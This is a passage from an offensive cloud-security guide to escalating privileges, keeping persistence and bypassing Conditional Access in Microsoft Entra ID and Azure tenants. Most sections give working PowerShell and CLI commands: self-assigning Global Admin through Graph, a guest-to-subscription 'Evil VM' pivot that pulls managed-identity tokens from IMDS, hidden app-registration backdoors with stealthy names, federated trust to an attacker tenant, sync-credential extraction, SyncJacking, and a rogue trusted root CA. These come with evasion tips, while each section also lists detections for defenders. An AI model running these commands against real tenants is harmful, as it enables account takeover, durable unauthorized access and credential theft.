Here's the catch: all of these controls only work if they're enabled. MAA is opt-in. Scope tags require deliberate configuration. The exact same attack still works against any org that hasn't adopted MAA or is still running basic MFA on their Intune admin accounts. Post-Stryker, the question isn't whether Microsoft has the controls. It's whether your target org turned them on.
Even without Intune admin, if you can modify device compliance policies, you can mark a device as compliant that shouldn't be, which may satisfy Conditional Access policies that require device compliance. That's an indirect CA bypass.
Detection: Intune audit logs show script deployment and compliance policy changes. New script assignments or policy modifications by unexpected admins should alert. Defender for Endpoint logs script execution on managed devices, and with Advanced Security Audit enabled, MDE captures the full script content, not just the execution event, so defenders can inspect exactly what was pushed.
Automation Account and Runbook abuse
Requires: Contributor or Automation Contributor role on the Automation Account resource.
This one flies under the radar. Azure Automation Accounts run PowerShell or Python runbooks on a schedule or on demand. The runbook executes as whatever identity is assigned to the Automation Account. Older tenants still have "Run As" accounts (deprecated since September 2023, but Microsoft only removed the creation UI, not existing ones). Newer setups use system-assigned or user-assigned managed identities instead. Either way, the runbook inherits that identity's full permissions. If someone gave the Automation Account's identity Contributor on the subscription or Directory.ReadWrite.All in Graph because "the runbook needs to manage resources," you now have a code execution primitive running at that privilege level.
First, find what you're working with:
Get-AzAutomationAccount | Format-Table AutomationAccountName, ResourceGroupName, Location
# List runbooks in a specific Automation Account
Get-AzAutomationRunbook -AutomationAccountName "corp-automation" -ResourceGroupName "rg-infra" | Format-Table Name, State, RunbookType
# Check the identity assigned to the account (managed identity or Run As)
Get-AzAutomationAccount -Name "corp-automation" -ResourceGroupName "rg-infra" | Select-Object -ExpandProperty Identity
The attack is simple: either modify an existing runbook or create a new one. If you modify one that's already scheduled, your code runs automatically at the next trigger. If you create a new one, you start it manually. Either way, the code runs as the Automation Account's identity. Add a credential to a privileged app registration, create a new user, assign a role, whatever the identity's permissions allow.
OPSEC: Modifying an existing runbook is quieter than creating a new one. Runbook jobs show up in the Automation Account's job history, so your execution is logged. If there's an active runbook that runs frequently, slipping a few lines into it blends in better than a brand new "totally-not-malicious" runbook appearing out of nowhere.
Detection: Monitor for runbook modifications and new runbook creation in Azure Activity Log (Microsoft.Automation/automationAccounts/runbooks/write). Alert on runbook jobs that make Graph API calls or Azure role assignments that don't match the runbook's documented purpose. Also audit which identities your Automation Accounts are running as and what permissions those identities actually have.
Dangerous Entra roles
Requires: any valid user credentials for recon (role assignments are readable by default). RoleManagement.ReadWrite.Directory for assignment.
Global Admin gets all the attention, but there are other roles that are nearly as dangerous. Here's each one, how to find who holds it, and how to assign it to yourself if you have write access.
First, grab your own object ID. You'll need it for every assignment call below:
$me.id
| Role | Template ID | What it enables | Why it's dangerous |
|---|---|---|---|
| Privileged Role Administrator | e8611ab8-c189-46e8-94e1-60213ab1f814 | Assign any role to anyone, including Global Admin | One API call from the top. This is Global Admin with extra steps removed. |
| Privileged Auth Administrator | 7be44c8a-adaf-4e2a-84d6-ab2649e08a13 | Reset credentials and MFA for ANY user, including Global Admins | Account takeover with zero exploit complexity. Reset a GA's password, log in as them, done. |
| Application Administrator | 9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3 | Full control over all app registrations and service principals | Add a secret to any privileged app, authenticate as it, inherit all its permissions. |
| Cloud Application Administrator | 158c047a-c907-4556-b7ef-446551a6b5f7 | Same as App Admin minus on-prem/proxy apps | In cloud-only orgs (most of them now), the difference is academic. Same escalation path. |
| Exchange Administrator | 29232cdf-9323-42fd-ade2-1d097af3e4de | Full control over Exchange Online | Full email surveillance. Create mail flow rules, intercept MFA codes, hide security alerts via inbox rules. |
| Intune Administrator | 3a2c62db-5318-420d-8d74-23affee5d9d5 | Full control over Intune/Endpoint Manager | Code execution on every managed endpoint. Push scripts, wipe devices, bypass compliance-gated CA policies. |
| Partner Tier2 Support | e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8 | Reset passwords for non-admin users (CSP tenants only) | Leftover from partner delegation that nobody audits. Only present if a CSP relationship exists. |
The pattern for every role in that table is identical. Swap in the template ID and you're done:
$templateId = "e8611ab8-c189-46e8-94e1-60213ab1f814" # swap this
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/directoryRoles(roleTemplateId='$templateId')/members"
# Assign that role to yourself (requires RoleManagement.ReadWrite.Directory)
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Body (@{
principalId = $me.id
roleDefinitionId = $templateId
directoryScopeId = "/"
} | ConvertTo-Json)
Note: directoryRoles only lists roles that have been activated in the tenant. If a role has never had a member assigned, it won't appear. For a complete picture, query roleManagement/directory/roleAssignments instead.
The one worth expanding: Privileged Role Administrator
This is the most interesting role in the table because it's self-reinforcing. Once you have it, you can assign any role to anyone, including itself. That means you can grant yourself Global Admin, Privileged Auth Admin, or anything else in a single call. You can also grant those roles to a service principal you control, creating a persistence path that survives user account remediation.
The escalation from Privileged Role Administrator to Global Admin is literally one POST. The real danger is that orgs monitor Global Admin assignments but often miss who holds the role that can create those assignments. If you're doing recon, always check this role first:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/directoryRoles(roleTemplateId='e8611ab8-c189-46e8-94e1-60213ab1f814')/members"
# If you have it, go straight to Global Admin
# Same roleAssignments POST from the dangerous permissions section above,
# targeting $me.id instead of a separate user object ID.
The shortcut: straight to Global Admin
If you have RoleManagement.ReadWrite.Directory, skip the stepping stones. One call, you're Global Admin (role template ID: 62e90394-69f5-4237-9190-012177145e10):
Same roleAssignments POST from the dangerous permissions section above, with $me.id as the principalId.
This is why RoleManagement.ReadWrite.Directory is the most dangerous single permission in Entra. One API call and you're Global Admin. No MFA bypass, no phishing, no credential theft. Just a Graph API call that many orgs don't audit.
The principle is the same as on-prem: don't just look at who's a Global Admin. Look at who can become one.
Detection: "Add member to role" in the directory audit log. PIM alerts fire if PIM is configured. Any role assignment to Global Admin or Privileged Role Administrator outside PIM should be an immediate alert.
Privileged Identity Management (PIM)
Requires: RoleManagement.Read.Directory for enumeration. RoleManagement.ReadWrite.Directory plus MFA (and possibly approval) for activation.
Before you try any of the role assignment attacks above, you need to know if PIM is in play. PIM changes everything. Instead of permanently active role assignments, roles become "eligible" and require activation, which forces MFA and can require manager approval with a time limit. If PIM protects a role, your direct roleAssignments POST will just fail.
First, check what's actually active versus what's sitting behind a PIM gate:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleInstances"
# Eligible assignments (these require activation + MFA to use)
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilityScheduleInstances"
If you see lots of eligible assignments and few active ones, PIM is running the show. Your options narrow: you either activate an eligible assignment (which means you need the user's MFA), or you find a path that PIM doesn't cover.
Here's the key insight that makes this section worth reading: PIM only protects user role assignments. Service principals with the same roles are permanently active. PIM doesn't gate them, doesn't require activation, doesn't log the same way. This is why the app registration and service principal escalation paths from the earlier sections are often more practical than trying to assign directory roles directly. If a service principal already holds Privileged Role Administrator, it's always on. No MFA, no approval, no time window.
Detection: PIM activation events appear in the directory audit log under "PIM" category. Watch for activations outside business hours or from unusual IPs. Also audit which service principals hold privileged roles, since PIM won't protect those.
B2B guest attack paths
Requires: guest account in the target tenant, plus billing role access for the subscription escalation path.
Guest accounts aren't the low-risk thing many orgs treat them as. The default assumption is that a guest user has minimal permissions and limited blast radius. That assumption is wrong, and it's getting worse.
BeyondTrust published "Restless Guests" in May 2025, documenting a path where guest users with billing roles can create Azure subscriptions in the external tenant and become Owners of those subscriptions. Microsoft's response: "by design." First step: check if you have billing access as a guest. You can do this from the portal (Cost Management + Billing) or from the CLI:
az billing account list --output table
# If that returns data (not 403), create a subscription (makes you Owner)
az account alias create --name "research" \
--billing-scope "/providers/Microsoft.Billing/billingAccounts/{id}/billingProfiles/{id}/invoiceSections/{id}" \
--display-name "Research" --workload "Production"
# You now own that subscription. Create a VM with managed identity
az vm create --resource-group "rg-pivot" --name "pivot-vm" \
--image Ubuntu2204 --assign-identity
# From the VM, get a Graph token via IMDS
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -H "Metadata: true"
On the test tenant, PowerZure confirmed 3 Azure subscriptions visible to the authenticated account:
Active Subscription : Azure subscription 1
(4e5adb24-09e8-4a01-adbb-c6cee339f639)
Available Subscriptions : Azure subscription (Cap)
(2fc955b8-5901-4fad-ab4e-804600b5b0a6),
Azure subscription 1
(4e5adb24-09e8-4a01-adbb-c6cee339f639),
Subscription 1
(09f4dd5a-c526-45ba-b9cb-5e12342d8bd1)
Three subscriptions means three potential pivot points. Each one is a surface where an Owner role can spawn VMs with managed identities. The key insight: guest users with billing roles create Azure subscriptions and become Owners. From Owner on a subscription with managed identities, you pivot to Entra roles. Defenders don't see subscription creation as escalation because it happens in Azure RBAC, which Entra alerts don't cover. Microsoft's response: "by design."
From that Owner role, you pivot using the "Evil VM" technique: create a VM in the subscription, assign it a system-managed identity, grant that managed identity an elevated role (Owner or User Access Administrator on the subscription), then use the VM's identity endpoint to get tokens and call Graph API. The managed identity persists independently of your guest session.
The piece that's often glossed over is exactly how you go from "Owner on a subscription" to "Entra directory role." It's not automatic. The managed identity's service principal exists in Entra, but it only has Azure RBAC permissions by default. To bridge into Entra, you use the managed identity's Graph token (obtained from IMDS) to assign itself an Entra directory role - this works because the RoleManagement.ReadWrite.Directory permission can be granted to the managed identity's service principal, or you can use the Azure AD Graph fallback endpoint which some tenants still expose. The more reliable path: from the VM, request a token for the Graph API resource, then call the roleManagement/directory/roleAssignments endpoint to assign Global Admin (or any role) to the managed identity's own service principal ID. Here's the full pivot from inside the VM:
$token = (Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -Headers @{Metadata="true"}).access_token
# Get the managed identity's own service principal objectId
$me = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$filter=appId eq '$((Invoke-RestMethod -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Headers @{Metadata='true'}).client_id)'" -Headers @{Authorization="Bearer $token"}
$spId = $me.value[0].id
# Assign Global Admin role to the managed identity
$body = @{ principalId = $spId; roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10"; directoryScopeId = "/" } | ConvertTo-Json
Invoke-RestMethod -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Headers @{Authorization="Bearer $token"; "Content-Type"="application/json"} -Body $body
This requires the managed identity to already have RoleManagement.ReadWrite.Directory, which you grant via the Azure CLI as subscription Owner. The key point is that Azure RBAC Owner on a subscription doesn't directly grant Entra admin, but it gives you the stepping stones (managed identity creation + app role assignment capability) to get there. The entire pivot happens through API calls that don't show up in Entra sign-in logs because managed identities authenticate via IMDS, not interactive sign-in.
Defenders rarely see this coming because subscription creation by a guest doesn't trigger any default Entra alerts. It shows up in Azure Activity Log under the billing resource provider, which most SOC teams aren't monitoring. The pattern is consistent: Azure RBAC and Entra ID treat guests differently, and the gaps between those two permission models create real escalation paths.
If your tenant has B2B guests (and most do), audit what Azure RBAC roles they hold. Don't just check Entra directory roles. A guest with zero Entra admin roles but Contributor on a subscription with managed identities can do more damage than you'd expect. The remediation here is straightforward: restrict guest access in Entra external collaboration settings, limit what guests can do in Azure RBAC, and actually monitor guest sign-in activity. Many orgs skip these controls entirely.
While you're auditing B2B guest access, check the cross-tenant access policies too. These control inbound and outbound trust between your tenant and partner organizations, things like B2B direct connect and whether you accept MFA or device compliance claims from external tenants. Pull the current partner configurations with GET /policies/crossTenantAccessPolicy/partners (or Invoke-MgGraphRequest -Uri "v1.0/policies/crossTenantAccessPolicy/partners") and look at what each partner entry has under inboundTrust. If you see isMfaAccepted: true or isCompliantDeviceAccepted: true, that means your tenant is trusting those claims from the partner tenant without re-verifying them locally.
The risk here is straightforward: if a partner tenant gets compromised, the attacker satisfies MFA in that tenant, and your tenant just trusts it. They walk right through your Conditional Access policies that require MFA because the claim comes in pre-satisfied. Same story with compliant device claims. Most orgs set these up during a B2B project and never revisit them. During an assessment, flag every partner with inbound trust enabled and ask whether that trust is still justified. If nobody can name the business reason for it, it probably shouldn't be there.
Detection: Guest sign-in activity in sign-in logs (userType "Guest"). Subscription creation appears in Azure Activity Log as a Microsoft.Subscription/aliases/write operation, but most SOCs don't have a detection rule for it because it's not in any default alert template and the resource provider is rarely referenced in standard SIEM content. You need to explicitly add an Activity Log alert or Azure Monitor rule filtering on this operation name. Also monitor Microsoft.Billing resource provider operations by guest accounts, and watch for new role assignments (Microsoft.Authorization/roleAssignments/write) on freshly created subscriptions, which is where the actual escalation happens.
Once you've escalated, you have Global Admin or equivalent. You own the tenant. But that access is fragile. It's one password reset, one alert, one suspicious sign-in notification away from being revoked. You need to make it stick.
Persistence: staying in the cloud
You have admin access. Now you need to keep it. Passwords get reset. MFA gets re-enrolled. Accounts get disabled. Cloud persistence is different from on-prem: no registry run keys, no scheduled tasks on a domain controller. You're creating authentication paths that exist independently of any single user account.
Rogue app registrations
Requires: Application.ReadWrite.All permission or Application Administrator role.
This is the most reliable cloud persistence mechanism I know. Create an app registration with a client secret or certificate credential. Apps don't have MFA. Apps don't have Conditional Access (usually). When the user whose account you compromised changes their password, your app still works.
$appBody = @{
displayName = "Azure Backup Sync Agent" # Name it something boring
signInAudience = "AzureADMyOrg"
} | ConvertTo-Json
$app = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications" -Body $appBody
# Add a client secret (valid for 2 years by default)
$secretBody = @{ passwordCredential = @{ displayName = "key1" } } | ConvertTo-Json -Depth 2
$secret = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/$($app.id)/addPassword" -Body $secretBody
# Save the secret value - it's only shown once
$secret.secretText
Here's the actual output from running the full illicit consent simulation against the test tenant:
=== STEP 1: Create rogue app registration ===
App created: C2-Test-IllicitConsent-DELETE-ME | AppId: 00000000-0000-0000-0000-000000000001 | ObjectId: 00000000-0000-0000-0000-000000000002
=== STEP 2: Add client secret ===
Secret added: test-backdoor-secret
Secret value: xXx~placeholder~secret~value~xXx
Expires: 03/19/2028 18:28:40
An attacker now has: App ID + Secret = persistent access that survives password resets
=== STEP 3: CLEANUP - Delete the rogue app ===
App deleted: 00000000-0000-0000-0000-000000000002
=== CONCLUSION ===
Illicit consent grant simulation: WORKS
Created app + secret in seconds with Application.ReadWrite.All
This is how attackers establish persistent backdoor access
That's the whole thing. Connect, create app, add secret, done. Seconds. The secret is valid until 2028. Persistent access that survives password resets, MFA re-enrollment, and account suspension. Cleaned it up right after, obviously.
The trick is naming it something that blends in. "Azure Backup Sync Agent" or "Microsoft Teams Webhook" or "SharePoint Migration Tool." Something an admin would glance at and assume is legitimate. Then request the permissions you need through admin consent (if you have an admin session) or through delegated consent if the tenant allows it.
OPSEC: Moderate. App registration events are logged in the Entra audit log, but who watches those? Most SOC teams don't alert on new app registrations or credential additions.
Detection: "Add application" and "Add service principal" in the Entra audit log. "Update application - Certificates and secrets management" when secrets are added. Alert on new app registrations by non-standard accounts.
Federated identity credentials
This is newer and sneakier. Federated identity credentials let an app authenticate without any stored secret or certificate. Instead, the app trusts tokens from an external identity provider. You set up a federation to an IdP you control (could be another Azure tenant, could be GitHub Actions, could be anything that issues OIDC tokens), and your external identity can authenticate as that app.
# This trusts tokens from an external tenant you control
$fedBody = @{
name = "external-trust"
issuer = "https://login.microsoftonline.com/{attacker-tenant-id}/v2.0"
subject = "{attacker-app-object-id}"
audiences = @("api://AzureADTokenExchange")
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/{target-app-id}/federatedIdentityCredentials" -Body $fedBody
No secret to rotate. No certificate to expire (well, the federation configuration persists until someone removes it). The app just trusts your external tenant. This is hard to detect because there's no credential in the app's properties to find, just a federation configuration that most admins don't know to look for.
Detection: "Update application" audit log entry when federated identity credentials are added. Query applications for federatedIdentityCredentials via Graph and alert on new external issuer trusts.
The most common real-world version of this is GitHub Actions. A lot of orgs have moved their CI/CD pipelines to use workload identity federation so their workflows can authenticate to Azure without storing any secrets. The GitHub runner requests an OIDC token from GitHub's identity provider, presents it to Azure AD, and gets back an access token for the federated service principal. No client secret, no certificate, nothing stored in GitHub secrets at all. It's actually a solid security improvement over the old "store a service principal secret in your repo" approach. But it creates a different attack surface.
If you compromise a GitHub repo that has a federated credential configured, you can authenticate as that Azure service principal just by running a workflow. Fork the repo, push a malicious workflow, and if the federation is configured loosely enough, you're in. The federation config specifies which repo, branch, and optionally which environment can request tokens. A well-scoped config might say "only the main branch in the production environment of org/repo can authenticate." A lazy config might just trust any branch in the repo, or skip the environment constraint entirely. Check the subject field on the federated credential. If it looks like repo:org/repo:ref:refs/heads/main that's scoped. If it's repo:org/repo:* or just trusts the whole repo with no branch filter, any contributor who can push a branch can pivot into Azure. You're looking for these with GET /applications/{id}/federatedIdentityCredentials and reviewing the issuer (should be https://token.actions.githubusercontent.com for GitHub) and subject claims.
Golden SAML
Requires: local admin on the ADFS server.
If your target uses AD FS for SSO and you can extract the token signing certificate, you can forge SAML tokens for any user -- including Global Admins -- without their password or MFA. This is the cloud equivalent of a golden ticket, popularized by the SolarWinds breach. If you have the signing key, you are the federation server.
I didn't test this one (the test tenant uses managed auth, not ADFS). AADInternals commands for reference (untested):
$saml = New-AADIntSAMLToken -ImmutableId "<base64-encoded-guid>" -Issuer "http://adfs.contoso.com/adfs/services/trust" -PfxFileName ".\signing_cert.pfx"
$tokens = Get-AADIntOAuthInfoUsingSAML -SAMLToken $saml -Resource "https://graph.microsoft.com"
OPSEC: Silent. Forged SAML tokens don't generate authentication events in Entra because the trust chain starts at the federation server, which you control.
Detection: Extremely difficult. Monitor for ADFS token signing certificate exports (Event ID 1007, 1008). Microsoft Defender for Identity can flag suspicious ADFS activity.
Conditional Access exclusion backdoors
Requires: Conditional Access Administrator role.
If you have the access to modify Conditional Access policies, you can add exclusions for a group or account you control. Exclude your account from the "Require MFA" policy, the "Block legacy auth" policy, whatever you need. As long as you're subtle about it, this can persist for months.
The sneakier version: create a new security group, add your account to it, and add that group to the exclusion list of existing CA policies. Admins reviewing CA policies see a group name that sounds legitimate ("CA-BreakGlass-Accounts" or "Emergency-Access-Group") and don't investigate further.
OPSEC: Moderate. The Entra audit log captures every CA policy change. Any org that alerts on CA policy modifications will catch this, but many don't.
Detection: "Update conditional access policy" in the Entra audit log. This should always trigger an alert. Also monitor "Add group" and "Add member to group" for newly created exclusion groups.
Azure AD Connect abuse
Requires: local admin on the Azure AD Connect server.
If the tenant uses Azure AD Connect (now Entra Connect) for hybrid identity, the sync account (usually MSOL_[hex] or AAD_[hex]) has extensive permissions in both AD and Entra. In AD, it typically has "Replicate Directory Changes" which means it can DCSync. In Entra, it has directory synchronization permissions.
If you compromise the server running AD Connect, you can extract the sync account credentials from the local database:
# Must be run on the AD Connect server as local admin
Get-AADIntSyncCredentials
That gives you the plaintext username and password for both the AD service account and the Entra connector account. From there, you can DCSync the domain (extract all password hashes from AD) or authenticate to Entra as the sync account and modify directory objects.
I check for the AD Connect server at every engagement. You can identify it by querying for the MSOL_ or AAD_ service accounts, or by checking Entra Connect Health in the portal. It's almost always a single server, sometimes not even domain-joined properly, running with local admin credentials that haven't been rotated since the initial setup. It's a high-value target that's often poorly protected.
Detection: Sign-in logs show the MSOL_ or AAD_ sync account authenticating from an unexpected source. Monitor Entra sign-ins for the sync service account and alert on any sign-in that doesn't originate from the AD Connect server's known IP.
SyncJacking and Cloud Sync abuse
AD Connect abuse goes deeper than credential extraction. SyncJacking exploits the hard match mechanism that Entra uses to link on-prem AD accounts to cloud identities. The actual attack chain works like this: you query the target's objectGUID from AD, create a new attacker-controlled account and set its ImmutableId to that same GUID (base64-encoded), then delete or disable the original account. When the next sync cycle runs, Entra performs a hard match on the objectGUID and links your new on-prem account to the target's cloud identity. Password gets overwritten. You now authenticate as them. This works against both Entra Connect and the newer Cloud Sync agent, and it can target any synced account including Global Admins.
Cloud Sync deserves a separate callout because it changes the attack surface in ways defenders don't expect. Unlike the legacy Connect server (single instance, staging mode available, SQL backend you can query), Cloud Sync runs as a lightweight provisioning agent - and orgs can deploy multiple agents for redundancy. Each agent authenticates to Entra with its own service principal and gMSA. The practical impact: there isn't one sync server to find and compromise, there are potentially several, and each one has the same hard match capability. Worse, Cloud Sync has no staging mode, so there's no safe way for defenders to test sync rule changes before they go live. For an attacker, this means your SyncJack takes effect on the next sync cycle with no preview step that might tip off an admin. The reconnaissance step changes too - instead of hunting for the single server running the "ADSync" service, you're looking for machines with the "AADConnectProvisioningAgent" service, which is often installed on existing domain controllers rather than a dedicated server. Run Get-ADComputer -Filter * -Properties servicePrincipalName | Where-Object { $_.servicePrincipalName -match 'provisioning' } to find them.
The first step in any engagement is finding which synced accounts are worth targeting:
$roleAssignments = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?`$expand=principal").value
$roleAssignments | ForEach-Object {
$user = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/users/$($_.principalId)?`$select=displayName,onPremisesSyncEnabled,userPrincipalName" -ErrorAction SilentlyContinue
if ($user.onPremisesSyncEnabled -eq $true) {
[PSCustomObject]@{ UPN = $user.userPrincipalName; RoleId = $_.roleDefinitionId }
}
}
Any synced account holding Global Admin, Privileged Role Administrator, or Authentication Policy Administrator is a prime target. Service accounts are especially attractive because they almost never have MFA enrolled.
Detection-wise, Entra audit logs record hard match events under the "Azure AD Connect" service with an activity type of "Hard match user." When a hard match fires on an account that already existed and had active sign-ins, that should be an immediate alert. Many orgs don't have that alert configured. Microsoft announced enforcement of hard match validation starting June 1, 2026. Until that specific date, the only thing stopping this attack is MFA on the targeted account. After June 2026, Entra will validate that the on-prem account actually matches before completing the hard match. But that's a future fix for a current problem.
While you're in the certificate neighborhood: certificate-based authentication (CBA) has its own abuse path. The attack chain requires Global Admin or Authentication Policy Administrator. You generate a self-signed root CA, upload it to the tenant's trusted certificate authorities via Graph API, issue a client certificate for your target user from that CA, and then modify the CBA authentication policy to trust your CA. The result: you authenticate as any user with a forged certificate, no MFA challenge, no password needed.
$orgId = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/organization").value[0].id
$certB64 = [Convert]::ToBase64String(([System.Security.Cryptography.X509Certificates.X509Certificate2]::new(".\rogueca.cer")).RawData)
$body = @{
certificateAuthorities = @(@{
isRootAuthority = $true
certificate = $certB64
})
} | ConvertTo-Json -Depth 5
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/organization/$orgId/certificateBasedAuthConfiguration" -Body $body -ContentType "application/json"
Once the CA is trusted, you issue a client cert with the target user's UPN in the Subject Alternative Name, then authenticate with it. EntraPassTheCert automates the cert-based authentication and lateral movement piece. CBA is supposed to be the "phishing-resistant" option, but if the trust anchors aren't locked down, it becomes the persistence mechanism instead.
The cert-based backdoor works too. Here's the sequence:
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -NotAfter (Get-Date).AddYears(2)
# Add it as a key credential to the app, create service principal, authenticate:
Connect-MgGraph -ClientId $app.appId -TenantId $tenantId -CertificateThumbprint $cert.Thumbprint
# Result:
Welcome to Microsoft Graph!
Connected via ClientCredential to tenant contoso.onmicrosoft.com
No password, no MFA, no interactive login. Just the cert.
Detection: "Update organization" audit log entry when trusted certificate authorities are modified. "Update authentication method policy" when CBA policy changes. Any modification to the tenant's trusted CA list should be an immediate alert.
That covers persistence. Even if the original account gets burned, you've got independent paths back in. But Conditional Access is probably still getting in your way for some of these.
Conditional Access bypass
CA policies are the locks on the doors. You've got persistence, but some resources and actions might still be gated behind policies that require specific device states, network locations, or authentication strengths. You need to find which doors are unlocked or have broken locks. CA is the primary security control in Entra. If you can bypass it, most of the other defenses fall apart. I'm dedicating a separate section to this because it comes up in almost every assessment.
Legacy authentication
Requires: valid credentials. Tests whether legacy protocols bypass MFA.
Microsoft has been killing basic auth for years. Exchange Online basic auth for most protocols (ActiveSync, POP, IMAP, EWS) was disabled in October 2022. SMTP AUTH has been the last holdout. The original plan was to kill it by April 2026, but that timeline slipped. Current plan is default disable by December 2026, with full removal sometime in H2 2027. As of right now, many tenants still have it enabled (check under Exchange Online settings). The window is closing but it's not closed.
If a CA policy blocks legacy auth but the policy doesn't apply to all cloud apps, there might be apps that still accept it. Test with specific protocol endpoints:
$cred = Get-Credential
Send-MailMessage -SmtpServer "smtp.office365.com" -Port 587 -UseSsl -Credential $cred -From "user@contoso.com" -To "test@contoso.com" -Subject "test" -Body "test"
(Yes, Send-MailMessage is deprecated too. Use it for testing, not production.)
Detection: Sign-in logs show "Legacy Authentication" as the client app type. Filter for legacy auth protocols (IMAP, POP3, SMTP, ActiveSync) and alert on any successful authentication via these methods.
Device compliance gaps
Requires: access to an Entra-joined compliant device (to extract PRT or device cert), or a device that isn't enrolled in Intune at all.
First, figure out if compliance is actually enforced. Pull the CA policies and check which ones have device compliance as a grant control:
$policies = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
$policies.value | Where-Object { $_.grantControls.builtInControls -contains "compliantDevice" } |
Select-Object displayName, state, @{N="Apps";E={ $_.conditions.applications.includeApplications }}
If policies require compliance but only target "All cloud apps," look for exclusions. There are almost always excluded apps or user groups. Those are your way in. More importantly, device compliance only works for devices enrolled in Intune. BYOD machines, Linux workstations, personal macOS devices: if they aren't enrolled, compliance can't be evaluated, and the policy either blocks them outright or (more commonly) gets scoped so it doesn't apply to them. Check the policy conditions for included/excluded platforms. If "Linux" or "macOS" isn't in the platform filter, the policy might not trigger for those device types at all.
The other angle: if you have access to a compliant device, extract the Primary Refresh Token and replay it from a different machine. The PRT satisfies the compliance check because the token itself carries the device claim. On VMs or devices without TPM attestation, this is straightforward. On hardware with TPM-bound keys, you need to work on the compliant device directly or find a way to proxy through it. ROADtools and AADInternals both have tooling for PRT extraction and replay.
Detection: Monitor for PRT replay from non-compliant or unregistered devices by filtering sign-in logs where deviceDetail.isCompliant is false yet a Conditional Access policy requiring compliance did not block the request. Alert on token usage originating from devices that do not appear in Intune's managed device inventory, which indicates an unregistered or BYOD device satisfying the compliance claim via a replayed PRT. Cross-reference the deviceId in the sign-in event against registered device objects in Entra; a mismatch or missing device record is a strong indicator of token replay.
Trusted location abuse
Requires: valid credentials plus network access from a trusted IP range, or a VPN endpoint in the right country.
Start by enumerating what the tenant considers "trusted." Named locations are readable through Graph if you have Policy.Read.All or equivalent:
$locations = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/identity/conditionalAccess/namedLocations"
$locations.value | ForEach-Object {
Write-Output "$($_.displayName) | Trusted: $($_.isTrusted) | Type: $($_.'@odata.type')"
if ($_.ipRanges) { $_.ipRanges | ForEach-Object { Write-Output " Range: $($_.cidrAddress)" } }
if ($_.countriesAndRegions) { Write-Output " Countries: $($_.countriesAndRegions -join ', ')" }
}
You'll see two types. IP-based locations define CIDR ranges (corporate office egress IPs, VPN concentrators). Country-based locations just check the geo-IP of the source address. The bypass depends on which type you're dealing with. For country-based locations, route through a commercial VPN endpoint in the approved country. Entra resolves your source IP against a geo-IP database, and commercial VPN providers work fine for this. For IP-based locations, you need to actually originate traffic from that range. That means either pivoting through a compromised on-prem host that egresses through the trusted IP, or getting onto the corporate VPN with stolen credentials. If VPN access itself doesn't require MFA (common in orgs that only enforce MFA through CA policies on cloud apps), you can authenticate to the VPN with just a password, land on the trusted network, and then hit Entra resources with MFA skipped.
The real payoff: many orgs set CA policies to "skip MFA from trusted locations" as a usability tradeoff. Once you're originating from a trusted range, you can password spray without MFA blocking you, authenticate to any cloud app without a second factor, and pivot freely between services. Test whether the trusted location exclusion applies to all CA policies or just some. If even one policy skips MFA for trusted locations, that's your entry point.
Detection: Monitor sign-in logs for authentications originating from known commercial VPN provider egress IP ranges, especially where the sign-in satisfies a trusted location condition. Alert on sign-ins that pass location trust but fail device compliance or have no device claim, as this combination suggests an attacker routing through a trusted network without a managed device. Flag impossible travel patterns between trusted locations (e.g., a user authenticating from two different corporate office egress IPs in different cities within minutes). Review named location changes in the directory audit log ("Update named location") for unauthorized additions to trusted IP ranges.
Token lifetime and CAE
Requires: a stolen access or refresh token.
Access tokens are typically valid for 60-90 minutes. Refresh tokens can last much longer (up to 90 days for some configurations). If you steal a refresh token, you can keep generating new access tokens long after the user changes their password, unless Continuous Access Evaluation (CAE) is enabled.
CAE only works with apps that actually support it: Exchange Online, SharePoint Online, Teams, and Microsoft Graph (but only when you request CAE-capable scopes like Mail.Read or Files.ReadWrite). If you're calling Graph with something like Directory.Read.All through a custom app registration, CAE probably isn't protecting that token. Same goes for Azure Resource Manager, third-party SAML apps, and anything using ROPC or device code flow tokens outside the supported list.
There are two flavors. Default CAE covers the obvious stuff: password changes, user disabled, revoked refresh tokens. Microsoft pushes critical events to the resource provider and tokens get killed within minutes instead of waiting for expiry. Strict location enforcement is the upgrade. It hooks into Conditional Access location policies and re-evaluates the IP on every single request. So if a token was issued on the corporate network and you replay it from your C2 box, strict enforcement catches that. Default CAE does not. Most orgs only have default, if they have CAE at all.
